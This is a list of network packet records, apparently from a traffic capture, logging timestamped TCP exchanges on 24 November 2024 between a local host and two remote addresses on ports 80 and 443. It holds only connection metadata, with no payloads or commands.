                                                                                                                                                                                                Nov 24, 2024 03:04:32.360002041 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.361052036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.361154079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.361193895 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.362248898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.362354994 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.362399101 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.363450050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.363540888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.363579988 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.364628077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.364748001 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.364800930 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.365832090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.366004944 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.366044044 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.367036104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.367162943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.367197037 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.367820978 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.368242979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.368339062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.368379116 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.369441032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.369532108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.370604992 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.370629072 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.370724916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.370764971 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.371810913 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.371908903 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.371944904 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.372992992 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.373122931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.373161077 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.373482943 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.373619080 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.373639107 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.374212980 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.374303102 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.374439001 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.375400066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.375487089 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.375530005 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.376591921 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.376715899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.376794100 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.377794981 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.377891064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.377931118 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.378988028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.379090071 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.379128933 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.380178928 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.380284071 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.380317926 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.381367922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.381443977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.383708954 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.487669945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.487744093 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.488044977 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.488228083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.488346100 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.488559008 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.489459991 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.489553928 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.489736080 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.490621090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.524632931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.524698019 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.524730921 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.525208950 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.525257111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.525268078 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.526397943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.526449919 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.526798010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.526968956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.527081013 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.527986050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.528098106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.528141022 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.529170036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.529273033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.529318094 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.530368090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.530493021 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.530592918 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531119108 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531204939 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531336069 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531523943 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531542063 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531555891 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531560898 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531569958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531678915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.531723976 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.532774925 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.532893896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.532954931 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.533960104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.534081936 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.534140110 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.534638882 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.534648895 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.535217047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.535280943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.535325050 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.536405087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.536462069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.537781954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.537831068 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.537888050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.538810015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.538897038 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.539047003 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.539953947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.540044069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.540091991 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.541126966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.541239023 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.541321039 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.542336941 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.542440891 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.542480946 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.543550968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.543648958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.543689966 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.544719934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.544842005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.545012951 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.545919895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.546032906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.546076059 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.546617985 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.546772957 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.546889067 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.546999931 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.547015905 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.547027111 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.547033072 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.547137022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.547238111 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.547286987 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.548336029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.548449039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.548640013 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.549547911 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.549549103 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.549555063 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.549634933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.549818993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.550718069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.550821066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.550868034 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.551897049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.552014112 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.552057028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.553116083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.553225994 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.554303885 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.554351091 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.554378986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.555490971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.555629969 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.555672884 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.556684017 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.556739092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.557715893 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.557871103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.558010101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.558053970 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.559091091 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.559196949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.559236050 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.560287952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.560415983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.560455084 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.561490059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.561582088 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.561635017 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.562661886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.562767029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.562817097 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.563885927 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.563978910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.564028025 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.565054893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.565164089 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.565244913 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.565244913 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.566306114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.566318035 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.566474915 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.567461014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.567559958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.567603111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.568654060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.568754911 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.568877935 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.569840908 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.569963932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.570075989 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.571049929 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.571160078 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.571206093 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.572248936 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.572346926 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.572540045 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.573446035 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.573543072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.573919058 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.574628115 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.574738026 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.575829029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.575874090 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.575936079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.576000929 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.576692104 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.576843977 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.576874971 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.577013969 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.577126980 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.577311993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.578223944 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.578289032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.578433037 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.579430103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.579530954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.579646111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.580600977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.580728054 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.581362963 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.581401110 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.581773996 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.581800938 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.581820965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.581914902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.582062960 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.582983971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.624330997 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.635735035 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.689097881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.689122915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.689269066 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.689543962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.689651966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.689701080 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.690726042 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.690828085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.690871000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.691914082 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.699151993 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.699238062 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.699513912 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.699573040 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.699594975 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.699609041 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.699615955 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.703010082 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.726087093 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.726169109 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.726587057 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.726650000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.726697922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.727794886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.727894068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.727942944 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.728984118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.729095936 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.730202913 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.730252981 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.730290890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.731396914 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.731455088 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.731487036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.732597113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.732636929 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.732697010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.733784914 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.733829021 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.733870029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.735043049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.735059977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.735110998 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.736176968 CET8049729185.215.113.16192.168.2.5
